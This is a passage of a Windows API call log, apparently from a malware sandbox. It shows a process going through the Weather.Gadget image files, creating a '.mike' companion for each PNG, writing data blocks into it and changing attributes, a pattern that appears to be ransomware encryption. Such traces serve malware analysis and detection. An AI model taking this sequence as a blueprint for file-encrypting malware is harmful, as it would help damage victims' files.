(lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.834] GetFileType (hFile=0x284) returned 0x1 [0134.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.834] GetFileType (hFile=0x284) returned 0x1 [0134.835] WriteFile (in: hFile=0x284, lpBuffer=0x214c494*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x214c494*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.835] CloseHandle (hObject=0x284) returned 1 [0134.835] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.835] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.835] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a78400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a78400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a9e560, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x3450)) returned 1 [0134.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.835] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.836] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.836] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x214dd30 | out: lpFileInformation=0x214dd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a78400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a78400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a9e560, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x3450)) returned 1 [0134.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.836] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.836] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", dwFileAttributes=0x80) returned 0 [0134.837] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.837] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.837] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a78400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a78400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a9e560, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x3450)) returned 1 [0134.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.837] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.837] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.837] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike")) returned 1 [0134.838] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.838] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.838] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.838] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0134.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.840] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.840] GetFileType (hFile=0x284) returned 0x1 [0134.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.840] GetFileType (hFile=0x284) returned 0x1 [0134.840] CloseHandle (hObject=0x284) returned 1 [0134.840] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.840] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.840] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0134.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.841] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.841] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png"), fInfoLevelId=0x0, lpFileInformation=0x21507e8 | out: lpFileInformation=0x21507e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdea259c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x21a1)) returned 1 [0134.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.841] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png"), fInfoLevelId=0x0, lpFileInformation=0x2150b94 | out: lpFileInformation=0x2150b94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdea259c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x21a1)) returned 1 [0134.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.841] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.841] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.842] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.842] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.842] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.842] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.842] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.842] GetFileType (hFile=0x284) returned 0x1 [0134.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.842] GetFileType (hFile=0x284) returned 0x1 [0134.842] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0134.843] WriteFile (in: hFile=0x284, lpBuffer=0x2151db0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2151db0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.845] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.850] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0134.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.852] WriteFile (in: hFile=0x284, lpBuffer=0x2164ab8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2164ab8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.853] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.854] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.854] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.855] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png", lpFilePart=0x0) returned 0x62 [0134.855] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.856] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x67 [0134.857] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", lpFilePart=0x0) returned 0x59 [0134.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.859] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.861] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.861] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", lpFilePart=0x0) returned 0x59 [0134.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.863] WriteFile (in: hFile=0x284, lpBuffer=0x216a2b0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x216a2b0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.865] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.867] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: 